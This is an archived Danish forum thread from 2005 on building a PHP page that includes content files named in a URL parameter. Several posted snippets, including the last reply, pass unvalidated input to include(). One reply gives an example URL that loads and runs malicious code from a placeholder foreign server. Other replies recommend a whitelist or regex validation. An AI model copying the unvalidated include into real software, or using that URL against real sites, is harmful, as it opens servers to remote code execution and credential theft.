/ Forside / Teknologi / Udvikling / PHP / Nyhedsindlæg
Login
Glemt dit kodeord?
Brugernavn

Kodeord


Reklame
Top 10 brugere
PHP
#NavnPoint
rfh 3959
natmaden 3372
poul_from 3310
funbreak 2700
stone47 2230
Jin2k 1960
Angband 1743
Bjerner 1249
refi 1185
10  Interkril.. 1146
include filer
Fra : Mikkel Gottlieb


Dato : 30-03-05 15:22

Først et link: http://www.monoland.dk/testphp/test.php

Mit problem er at jeg har forsøgt mig med en index fil som så includer top
og menu - denne menu poster så selve indholdet på siden. Det irriterende er
dog at jeg ikke kan få det indhold der skal være på siden til at stå ved
siden af menuen - jo nok fordi at menuen fylder "hele" den linie ...

er der nogen der har en ide til hvordan man gør det smartest ?

I min index (test.php) fil har jeg følgende kode:

<?php
include "side1.php";

include "side2.php";

if ($side)
{
include "$side";
}

?>

og i menuen laver jeg mine links sådan her <a
href="test.php?side=side4.php">link2</a> (hvor jeg så skifter side4.php ud
med det link jeg skal bruge)

Håber det er forståeligt

--
Mikkel



 
 
Mikkel Gottlieb (30-03-2005)
Kommentar
Fra : Mikkel Gottlieb


Dato : 30-03-05 15:23


"Mikkel Gottlieb" <slupper@slupper.dkX> skrev i en meddelelse
news:pBy2e.108134$Vf.4154801@news000.worldonline.dk...
> Først et link: http://www.monoland.dk/testphp/test.php

Som en lille fodnote så vil jeg lige sige at grunden til at jeg laver det på
den måde er at jeg gerne ville finde et alternativ til frames

--
Mikkel



Kristian Thy (30-03-2005)
Kommentar
Fra : Kristian Thy


Dato : 30-03-05 16:28

Mikkel Gottlieb wrote:
> er der nogen der har en ide til hvordan man gør det smartest ?

Ja, det har de i gruppen dk.edb.internet.webdesign.html. Dit spørgsmål
har så vidt jeg kan se intet med php at gøre.

\\kristian
--
Thomas Madsens fremragende guide til sikring af Windows:
http://home18.inet.tele.dk/madsen/windows/tjenester/

Ulrik Nielsen (30-03-2005)
Kommentar
Fra : Ulrik Nielsen


Dato : 30-03-05 17:02

Kristian Thy wrote:
> Mikkel Gottlieb wrote:
>> er der nogen der har en ide til hvordan man gør det smartest ?
>
> Ja, det har de i gruppen dk.edb.internet.webdesign.html. Dit spørgsmål
> har så vidt jeg kan se intet med php at gøre.

det tror jeg nu det har men Mikkel har vidst bare misforstået det lidt.

prøv ex:

--- index.php ----
<html>
...
<body>
<?php include 'topmenu.php'; ?>
<br>
<br>
<?php include $content; ?>
</body>
</html>
--------------------


--- topmenu.php ----
<?php
$content = empty($_GET['side']) ? 'default.php' : $_GET['side'];
?>
<a href="?side=side1.php">link tekst</a>
--------------------


Bemærk dog at dette IKKE er en anbefalet måde, i hvert fald ikke uden
validering af $_GET['side'] !!



--
ulrik nielsen |
-----------------+---------------------------------------------------
quote or the day | Your packets were eaten by the terminator
from bofh | http://www.cs.wisc.edu/~ballard/bofh/

Knud Gert Ellentoft (30-03-2005)
Kommentar
Fra : Knud Gert Ellentoft


Dato : 30-03-05 18:06

Ulrik Nielsen skrev:

>det tror jeg nu det har men Mikkel har vidst bare misforstået det lidt.

Nej, for resultatet afhænger af htmlinput, som includefilerne
giver, så det er et eller andet i htmlkodningen, der er årsag til
problemet.

Så det nemmeste er at Mikkel kommer med et link til siden og så
spørger i htmlgruppen.
--
Knud
Topposter du svar, så ryger du på min ignoreringsliste.
Svar under det du citerer og citer kun det du svarer på - tak.
http://usenet.dk/netikette/citatteknik.html

Mikkel Gottlieb (30-03-2005)
Kommentar
Fra : Mikkel Gottlieb


Dato : 30-03-05 20:05


"Knud Gert Ellentoft" <ellentoft@mail.tele.invalid> skrev i en meddelelse
news:rvml41136tpm9umfm6k5i1f8e8mt5h8r1o@dtext.news.tele.dk...

> Nej, for resultatet afhænger af htmlinput, som includefilerne
> giver, så det er et eller andet i htmlkodningen, der er årsag til
> problemet.

Seriously - skal man sidde og gennemregne alle parametre på kryds og tværs
for at poste i den rigtige gruppe. Jeg må sgu blankt erkende at hvis jeg har
et spørgsmål til en fil der ender på .php så poster jeg her og har jeg en
der slutter med .html så spø'r jeg i html gruppen ...

> Så det nemmeste er at Mikkel kommer med et link til siden og så
> spørger i htmlgruppen.

Jeg har givet et link

--
Mikkel



Kristian Thy (30-03-2005)
Kommentar
Fra : Kristian Thy


Dato : 30-03-05 20:23

Mikkel Gottlieb wrote:
> Seriously - skal man sidde og gennemregne alle parametre på kryds og tværs
> for at poste i den rigtige gruppe. Jeg må sgu blankt erkende at hvis jeg har
> et spørgsmål til en fil der ender på .php så poster jeg her og har jeg en
> der slutter med .html så spø'r jeg i html gruppen ...

Ville du også spørge din grønthandler om han kunne fikse din bil, bare
fordi den er grøn?

\\kristian
--
Thomas Madsens fremragende guide til sikring af Windows:
http://home18.inet.tele.dk/madsen/windows/tjenester/

Mikkel Gottlieb (30-03-2005)
Kommentar
Fra : Mikkel Gottlieb


Dato : 30-03-05 22:00


"Kristian Thy" <thy@itu.dk> skrev i en meddelelse
news:424afbf6$0$43985$14726298@news.sunsite.dk...

> Ville du også spørge din grønthandler om han kunne fikse din bil, bare
> fordi den er grøn?

Dårlig analogi.

--
Mikkel



Kristian Thy (30-03-2005)
Kommentar
Fra : Kristian Thy


Dato : 30-03-05 22:17

Mikkel Gottlieb wrote:
> Dårlig analogi.

Okay, så må vi jo tage fløjshandskerne af.

Fra gruppens fundats:
"Gruppens formål er at folk der laver websider ved brug af
php kan hjælpe hinanden med deres problemer, og diskutere
forskellige *php-relaterede* emner." (min fremhævning)

Dit spørgsmål har intet med php at gøre, og alt med html/css at gøre.
Hvis du så ikke var klar over det, ville jeg selvfølgelig ikke fare
sådan i blækhuset. Men når du udemærket har en idé om hvor hunden ligger
begravet, og så alligevel poster her i gruppen på grund af en eller
anden firkantet kassetænkning om at "spørgsmål til .php-filer hører til
i php-gruppen", så bliver jeg en anelse kort i tålmodigheden. Det sænker
kvaliteten af den hjælp man kan få her, at folk der gerne vil hjælpe med
andre folks php-problemer skal vade gennem fuldtændig irrelevante tråde
som din. Synes du også det var okay hvis jeg spurgte om hjælp til at få
hensigtsmæssige formuleringer på min side her i gruppen i stedet for i
dk.kultur.sprog, blot fordi der var tale om en .php-fil?

Hvis du stadig mener du har ret og jeg er en idiot, så kan jeg blot
henvise dig til http://usenet.dk/netikette/hardball.html

*plonk*

\\kristian
--
Thomas Madsens fremragende guide til sikring af Windows:
http://home18.inet.tele.dk/madsen/windows/tjenester/

Mikkel Gottlieb (30-03-2005)
Kommentar
Fra : Mikkel Gottlieb


Dato : 30-03-05 22:25


"Kristian Thy" <thy@itu.dk> skrev i en meddelelse
news:424b16b6$0$43993$14726298@news.sunsite.dk...

> Okay, så må vi jo tage fløjshandskerne af.

Hvorfor dog det ? Du har argumenteret og kommet med en analogi som intet
hold havde - that was it.

> Fra gruppens fundats:
> "Gruppens formål er at folk der laver websider ved brug af
> php kan hjælpe hinanden med deres problemer, og diskutere
> forskellige *php-relaterede* emner." (min fremhævning)

Ja - indeholdte min "index" fil ikke php ? KUNNE man forestille sig at
spørgsmålet _måske_ kunne have drejet sig om det var muligt at "rykke rundt"
på de includes på selve siden så det ville komme til at stå anderledes ?

> Dit spørgsmål har intet med php at gøre, og alt med html/css at gøre.
> Hvis du så ikke var klar over det, ville jeg selvfølgelig ikke fare
> sådan i blækhuset. Men når du udemærket har en idé om hvor hunden ligger
> begravet, og så alligevel poster her i gruppen på grund af en eller
> anden firkantet kassetænkning om at "spørgsmål til .php-filer hører til
> i php-gruppen", så bliver jeg en anelse kort i tålmodigheden.

Serøst Kristian - hvordan kan det nogensinde gå hen og blive mit problem
hvor tålmodighed en mand du er ? - Jeg mener stadigvæk spørgsmålet har med
php at gøre - men så vil du måske have at jeg poster i begge grupper?

> Det sænker
> kvaliteten af den hjælp man kan få her, at folk der gerne vil hjælpe med
> andre folks php-problemer skal vade gennem fuldtændig irrelevante tråde
> som din.

Efter *DIN* mening

> Synes du også det var okay hvis jeg spurgte om hjælp til at få
> hensigtsmæssige formuleringer på min side her i gruppen i stedet for i
> dk.kultur.sprog, blot fordi der var tale om en .php-fil?

Se det var en meget bedre analogi - og nej det mener jeg ikke - jeg kan
sagtens skelne...

> Hvis du stadig mener du har ret og jeg er en idiot, så kan jeg blot
> henvise dig til http://usenet.dk/netikette/hardball.html

Vis mig et sted hvor jeg har kaldt dig dette ...

> *plonk*

Ja plonk du bare derudaf - hvis dette er kvaliteten af hvad du kan
præsentere, så kan jeg godt være foruden.

--
Mikkel



Geert Lund (30-03-2005)
Kommentar
Fra : Geert Lund


Dato : 30-03-05 22:40

Mikkel Gottlieb wrote:

> Serøst Kristian - hvordan kan det nogensinde gå hen og blive mit problem
> hvor tålmodighed en mand du er ? - Jeg mener stadigvæk spørgsmålet har med
> php at gøre - men så vil du måske have at jeg poster i begge grupper?

Enten - har jeg misforstået dit indlæg i retning af også den tolkning
Kristian ligger for dagen - eller også er dit spørgsmål seriøst dårligt
formuleret.

Blot fordi en fil indeholder PHP koden "include" - ændrer det jo ikke på
det problem du forsøgte at løse virker til at have med placering af
html/css kode - og intet relateret til PHP.

Men igen - jeg tager forbehold for at jeg læste dit indlæg forkert...

- Men hvis jeg læste dit problem rigtigt - er der ingen tvivl om at
Kristian har ret - du bør dermed henvende dig i en html gruppe i stedet
for en php-programmeringsgruppe.


--
Med venlig hilsen
Geert Lund

Mikkel Gottlieb (30-03-2005)
Kommentar
Fra : Mikkel Gottlieb


Dato : 30-03-05 22:56


"Geert Lund" <glund-news@post.tele.dk> skrev i en meddelelse
news:424b1c05$0$182$edfadb0f@dtext02.news.tele.dk...

> Enten - har jeg misforstået dit indlæg i retning af også den tolkning
> Kristian ligger for dagen - eller også er dit spørgsmål seriøst dårligt
> formuleret.

Det er da meget muligt men jeg kan da i det mindste se at du er åben overfor
at det måske ikke er html kodningen og det er rart at se

> Blot fordi en fil indeholder PHP koden "include" - ændrer det jo ikke på
> det problem du forsøgte at løse virker til at have med placering af
> html/css kode - og intet relateret til PHP.

Der kunne have været trekanter eller femkanter på siderne istedet for
tables. Mit spørgsmål går UDELUKKENDE på om jeg kan få 2 elementer til at
stå ved siden af hinanden (med 3 includes velogmærke) - hvis man kan rette
det ved at fyre en gang html af så må du kalde mig mads - så vidt jeg kan se
så er der 2 muligheder:

1. Det rettes i index filen (test.php) at den ikke lægger filerne under
hinanden men at man har muligheden for at smide dem ved siden af hinanden.
2. Det kan ikke lade sig gøre

Jeg har set folk der foreslår at man gør det på den måde hvis man vil have
php's alternativ til frames, men hvis det ikke er muligt så er man jo lige
vidt

> Men igen - jeg tager forbehold for at jeg læste dit indlæg forkert...

Du har måske ikke forstået det korrekt, men ligefrem læst det forkert ved
jeg ikke

> - Men hvis jeg læste dit problem rigtigt - er der ingen tvivl om at
> Kristian har ret - du bør dermed henvende dig i en html gruppe i stedet
> for en php-programmeringsgruppe.

Jamen han har da givetvis ret i at html spørgsmål ryger i den relevante
gruppe - men jeg mener bare stadigvæk ikke det handler om html. At han så
plonk'er folk fordi de siger bøh til ham har jeg ingen respekt for (istedet
for at være åben) men nok om det

--
Mikkel



Geert Lund (30-03-2005)
Kommentar
Fra : Geert Lund


Dato : 30-03-05 23:12

Mikkel Gottlieb wrote:


> Der kunne have været trekanter eller femkanter på siderne istedet for
> tables. Mit spørgsmål går UDELUKKENDE på om jeg kan få 2 elementer til at
> stå ved siden af hinanden (med 3 includes velogmærke) - hvis man kan rette
> det ved at fyre en gang html af så må du kalde mig mads - så vidt jeg kan se
> så er der 2 muligheder:

Den opsætningsmæssige placering har intet med PHPs include at gøre - men
afhænger i sidste ende - komplet af HTML indholdet i de 2-3 PHP filer du
inkluderer.

Dermed har spørgsmålet i sig selv reelt set ikke meget med PHP at gøre -
men hvordan du laver HTML/CSS opsætning.

Hvis du derimod spørger - hvordan får du indholdet i dine 3 includes
"nestet" ind i hinanden, så kunne det straks være mere relevant. Men
altså selve den layoutmæssige del har intet med PHP at gøre.

Hvis problemet handler om hvordan du "nester" (kalder rekursivt om du
vil) - så har du så længe du inkluderer filer - stadig adgang til dine
globale variabler etc. i de inkluderede filer og du vil dermed kunne fx
kalde et filnavn hentet ind med variablen $_REQUEST['side'] (og du som
også blandt andet Peter Brodersen angav - checker den for diverse
problemfyldte informationer) - stadig bruge den i en underliggende
inkluderet fil.


--
Med venlig hilsen
Geert Lund

Mikkel Gottlieb (30-03-2005)
Kommentar
Fra : Mikkel Gottlieb


Dato : 30-03-05 23:21


"Geert Lund" <glund-news@post.tele.dk> skrev i en meddelelse
news:424b238b$0$166$edfadb0f@dtext02.news.tele.dk...

> Den opsætningsmæssige placering har intet med PHPs include at gøre - men
> afhænger i sidste ende - komplet af HTML indholdet i de 2-3 PHP filer du
> inkluderer.

Nej det har den vel ikke

> Dermed har spørgsmålet i sig selv reelt set ikke meget med PHP at gøre -
> men hvordan du laver HTML/CSS opsætning.

Og i sådan et tilfælde havde jeg nok slet ikke behøvet at spørge - men sådan
som det er lige nu (som jeg forstår det) så lægger filerne sig under
hinanden på siden og så vil da aldrig kunne få et element over eller ved
siden af et andet element som blev included før

> Hvis du derimod spørger - hvordan får du indholdet i dine 3 includes
> "nestet" ind i hinanden, så kunne det straks være mere relevant. Men
> altså selve den layoutmæssige del har intet med PHP at gøre.

Det _er_ jo sådan set det jeg gerne vil (at det så lige hedder "nested" var
jeg ikke klar over)

> Hvis problemet handler om hvordan du "nester" (kalder rekursivt om du
> vil) - så har du så længe du inkluderer filer - stadig adgang til dine
> globale variabler etc. i de inkluderede filer og du vil dermed kunne fx
> kalde et filnavn hentet ind med variablen $_REQUEST['side'] (og du som
> også blandt andet Peter Brodersen angav - checker den for diverse
> problemfyldte informationer) - stadig bruge den i en underliggende
> inkluderet fil.

Du sidder ikke tilfældigvis med et eksempel på det vel ? Jeg *tror* det er
noget der jeg skal bruge

--
Mikkel



Mikkel Gottlieb (30-03-2005)
Kommentar
Fra : Mikkel Gottlieb


Dato : 30-03-05 22:03


"Ulrik Nielsen" <un.spam@tiscali.dk> skrev i en meddelelse
news:424acd5f$0$23059$edfadb0f@dread15.news.tele.dk...

> det tror jeg nu det har men Mikkel har vidst bare misforstået det lidt.

Ja nemlig ja

> Bemærk dog at dette IKKE er en anbefalet måde, i hvert fald ikke uden
> validering af $_GET['side'] !!

Okay det må jeg lige læse lidt på så. Tak for dit hint

--
Mikkel



Peter Brodersen (30-03-2005)
Kommentar
Fra : Peter Brodersen


Dato : 30-03-05 18:27

On Wed, 30 Mar 2005 16:21:42 +0200, "Mikkel Gottlieb"
<slupper@slupper.dkX> wrote:

>I min index (test.php) fil har jeg følgende kode:
>
><?php
>include "side1.php";
>
>include "side2.php";
>
>if ($side)
> {
>include "$side";
>}
>
>?>

For en god ordens skyld er det på sin plads at nævne, at uden
yderligere validering er dette et sikkerhedshul af format, hvis
serveren er sat op til at kunne hente eksterne ressourcer (hvilket php
som standard er).

Fx hvis brugeren går ind på
test.php?side=http://fremmedserver/ondsindetphpkode.txt
så bliver koden hentet fra den fremmede server og afviklet lokalt.

--
- Peter Brodersen

Mikkel Gottlieb (30-03-2005)
Kommentar
Fra : Mikkel Gottlieb


Dato : 30-03-05 20:03


"Peter Brodersen" <usenet2005@ter.dk> skrev i en meddelelse
news:d2enhb$36q$1@news.klen.dk...

> For en god ordens skyld er det på sin plads at nævne, at uden
> yderligere validering er dette et sikkerhedshul af format, hvis
> serveren er sat op til at kunne hente eksterne ressourcer (hvilket php
> som standard er).

Kan du forklare nærmere ? Jeg er lidt blank lige på det punkt - mener du
brugervalidering ?

> Fx hvis brugeren går ind på
> test.php?side=http://fremmedserver/ondsindetphpkode.txt
> så bliver koden hentet fra den fremmede server og afviklet lokalt.

Aha - det lyder lidt risikabelt

--
Mikkel



Peter Brodersen (30-03-2005)
Kommentar
Fra : Peter Brodersen


Dato : 30-03-05 22:51

On Wed, 30 Mar 2005 21:02:33 +0200, "Mikkel Gottlieb"
<slupper@slupper.dkX> wrote:

>> For en god ordens skyld er det på sin plads at nævne, at uden
>> yderligere validering er dette et sikkerhedshul af format, hvis
>> serveren er sat op til at kunne hente eksterne ressourcer (hvilket php
>> som standard er).
>Kan du forklare nærmere ? Jeg er lidt blank lige på det punkt - mener du
>brugervalidering ?

Validering af at $side (eller $_GET['side'] ) ikke indeholder noget
uhensigtsmæssigt - som for eksempel en reference til en anden server.
Bedre er det at have en whitelist af hvad, den rent faktisk *må*
indeholde.

Om det er muligt at inkludere en ekstern fil afhænger af
allow_url_fopen (der tillader at inkludere filer over ftp, http,
etc.), men uanset om den er aktiveret eller ej, bør man validere
inputtet.

En simpel metode kunne være:

switch($side) {
   case 'side1':
   include 'side1.php';
   break;

   case 'side2':
   include 'side2.php';
   break;

   case 'brugere':
   include 'scripts/brugere_online.php';
   break;

   default:
   include 'forside.php';
}

Det kan også gøres på mange andre måder.

>> Fx hvis brugeren går ind på
>> test.php?side=http://fremmedserver/ondsindetphpkode.txt
>> så bliver koden hentet fra den fremmede server og afviklet lokalt.
>Aha - det lyder lidt risikabelt

Det er det. Kører serveren i safe_mode vil andre kunder (og serveren i
sig selv) typisk kunne lide begrænset skade, men du vil stadigvæk
risikere, at en angriber kan afvikle sin egen kode, der fx viser
kildeteksten af diverse php-filer (der måske indeholder forskellige
brugernavn og kodeord)

--
- Peter Brodersen

Mikkel Gottlieb (30-03-2005)
Kommentar
Fra : Mikkel Gottlieb


Dato : 30-03-05 23:23


"Peter Brodersen" <usenet2005@ter.dk> skrev i en meddelelse
news:d2f701$g8d$1@news.klen.dk...

> Validering af at $side (eller $_GET['side'] ) ikke indeholder noget
> uhensigtsmæssigt - som for eksempel en reference til en anden server.
> Bedre er det at have en whitelist af hvad, den rent faktisk *må*
> indeholde.

Ok

> Om det er muligt at inkludere en ekstern fil afhænger af
> allow_url_fopen (der tillader at inkludere filer over ftp, http,
> etc.), men uanset om den er aktiveret eller ej, bør man validere
> inputtet.

Aha

> En simpel metode kunne være:
>
> switch($side) {
> case 'side1':
> include 'side1.php';
> break;
>
> case 'side2':
> include 'side2.php';
> break;
>
> case 'brugere':
> include 'scripts/brugere_online.php';
> break;
>
> default:
> include 'forside.php';
> }
>
> Det kan også gøres på mange andre måder.

Okay jeg kan se at jeg må ind og studere det lidt nærmere - æv og jeg var
lige så glad for at jeg rent faktisk havde fået den til at erstatte en
include med en "variabel" (som det vel i virkligheden ikke er)

> Det er det. Kører serveren i safe_mode vil andre kunder (og serveren i
> sig selv) typisk kunne lide begrænset skade, men du vil stadigvæk
> risikere, at en angriber kan afvikle sin egen kode, der fx viser
> kildeteksten af diverse php-filer (der måske indeholder forskellige
> brugernavn og kodeord)

Jeg bruger web10 - ved ikke om de har det på den ene eller den anden måde

--
Mikkel



Per Thomsen (31-03-2005)
Kommentar
Fra : Per Thomsen


Dato : 31-03-05 22:49

Mikkel Gottlieb wrote:
> "Peter Brodersen" <usenet2005@ter.dk> skrev i en meddelelse
> news:d2enhb$36q$1@news.klen.dk...
>
>
>>For en god ordens skyld er det på sin plads at nævne, at uden
>>yderligere validering er dette et sikkerhedshul af format, hvis
>>serveren er sat op til at kunne hente eksterne ressourcer (hvilket php
>>som standard er).
>
>
> Kan du forklare nærmere ? Jeg er lidt blank lige på det punkt - mener du
> brugervalidering ?
>
>
>>Fx hvis brugeren går ind på
>>test.php?side=http://fremmedserver/ondsindetphpkode.txt
>>så bliver koden hentet fra den fremmede server og afviklet lokalt.
>
>
> Aha - det lyder lidt risikabelt
>

Da jeg bruger en lignende metode på mit website, vil jeg da lige for
eksemplets skyld vise dig, hvordan jeg validerer det:

$PAGE = $_GET['page'];

if(empty($PAGE)) $PAGE = "main.html";

//Tjekker om der er 0-2 punktummer og en slash
if( ereg('[\.]{0,2}\/', $PAGE) ) {
   $PAGE = "security.html";
}
//Tjekker at filen faktisk eksisterer i min document root
if(!file_exists('/stien/til/min/htdocs/'.$PAGE)) {
$PAGE = "error.html";
}

security.html og error.html er så to bare de to sider jeg viser, hvis
der er noget galt.
Du kan se dem ved f.eks. at prøve:
   http://www.pert.dk/?page=../sikkerhedsbrud
   http://www.pert.dk/?page=findesikke

Jeg vil nok give Peter Brodersen ret i at en whitelist er endnu bedre,
men det er jeg for doven til at lave, da jeg jo så skal rette
whitelisten, hver gang jeg tilføjer en ny fil.
Specielt hvis du har et område, som brugerne kan uploade filer til, vil
jeg klart anbefale whitelisten og ikke "min" metode. Men "min" metode
kan selvfølgelig udvides til at tjekke at det ikke er en uploadet fil.

MVH Per Thomsen,
http://www.pert.dk/

Mikkel Gottlieb (01-04-2005)
Kommentar
Fra : Mikkel Gottlieb


Dato : 01-04-05 01:47


"Per Thomsen" <pert@pert.dk> skrev i en meddelelse
news:424c7066$0$43993$14726298@news.sunsite.dk...

> $PAGE = $_GET['page'];
>
> if(empty($PAGE)) $PAGE = "main.html";
>
> //Tjekker om der er 0-2 punktummer og en slash
> if( ereg('[\.]{0,2}\/', $PAGE) ) {
> $PAGE = "security.html";
> }
> //Tjekker at filen faktisk eksisterer i min document root
> if(!file_exists('/stien/til/min/htdocs/'.$PAGE)) {
> $PAGE = "error.html";
> }

Det er FOR cool der ... mange tak - den kigger jeg lidt på ...

> security.html og error.html er så to bare de to sider jeg viser, hvis
> der er noget galt.
> Du kan se dem ved f.eks. at prøve:
> http://www.pert.dk/?page=../sikkerhedsbrud
> http://www.pert.dk/?page=findesikke

Jeg tjekker det lige ud imorgen

> Jeg vil nok give Peter Brodersen ret i at en whitelist er endnu bedre,
> men det er jeg for doven til at lave, da jeg jo så skal rette
> whitelisten, hver gang jeg tilføjer en ny fil.
> Specielt hvis du har et område, som brugerne kan uploade filer til, vil
> jeg klart anbefale whitelisten og ikke "min" metode. Men "min" metode
> kan selvfølgelig udvides til at tjekke at det ikke er en uploadet fil.

Ja - Brodersen er en klog mand

.... Tak igen

--
Mikkel



Marc Poulsen (01-04-2005)
Kommentar
Fra : Marc Poulsen


Dato : 01-04-05 22:37

Mikkel Gottlieb <slupper@slupper.dkX> skrev:
>Først et link:
>http://www.monoland.dk/testphp/test.p hp
>
>Mit problem er at jeg har forsøgt mig
>med en index fil som så includer top
>og menu - denne menu poster så selve
>indholdet på siden. Det irriterende er
>dog at jeg ikke kan få det indhold
>der skal være på siden til at stå ved
>siden af menuen

Hej Mikkel,

Nu kunne jeg hurtigt se i din source kode at du ikke gør brug af
tabeller. Dette kan jo gøre så dit indhold kommer op ved siden af
menuen..
Et eks.:

<table>
<tr>
<td>
<? include "menu.php"; ?>
</td>
<td>
<?
if($side) {
include $side . ".php"; //bemærk lige dette.
}
?>
</td>
</tr>
</table>

Så kommer indholdet op ved siden af menuen.
Men bemærk lige min note, det "smarte" ved at skrive:

include $side. ".php";

er at så behøver du ikke skrive http://dinside.dk/index.php?
side=side4.php, men bare index.php?side=side4.

-//Marc Poulsen -//MipZhaP


Søg
Reklame
Statistik
Spørgsmål : 177552
Tips : 31968
Nyheder : 719565
Indlæg : 6408849
Brugere : 218887

Månedens bedste
Årets bedste
Sidste års bedste